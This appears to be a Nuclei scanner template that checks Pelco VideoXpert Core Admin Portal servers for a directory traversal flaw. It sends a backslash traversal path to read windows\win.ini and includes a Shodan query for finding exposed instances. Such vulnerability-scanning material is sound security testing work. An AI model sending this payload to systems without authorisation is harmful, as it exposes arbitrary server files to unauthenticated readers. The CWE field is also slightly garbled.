nuclei-templates/vulnerabilities/videoxpert-lfi.yaml

39 lines
1.2 KiB
YAML

id: videoxpert-lfi
info:
name: Schneider Electric Pelco VideoXpert Core Admin Portal - Local File Inclusion
author: 0x_akoko
severity: high
description: Schneider Electric Pelco VideoXpert Core Admin Portal suffers from local file inclusion. Exploiting this issue will allow an unauthenticated attacker to view arbitrary files within the context of the web server.
reference:
- https://packetstormsecurity.com/files/143317/Schneider-Electric-Pelco-VideoXpert-Core-Admin-Portal-Directory-Traversal.html
- https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5419.php
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cwe-id: CWE-22Directory-Traversal.html
metadata:
shodan-query: title:"VideoXpert"
tags: schneider,pelco,packetstorm,lfi,videoxpert
requests:
- method: GET
path:
- '{{BaseURL}}/portal//..\\\..\\\..\\\..\\\windows\win.ini'
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'bit app support'
- 'fonts'
- 'extensions'
condition: and
- type: status
status:
- 200
# Enhanced by mp on 2023/01/15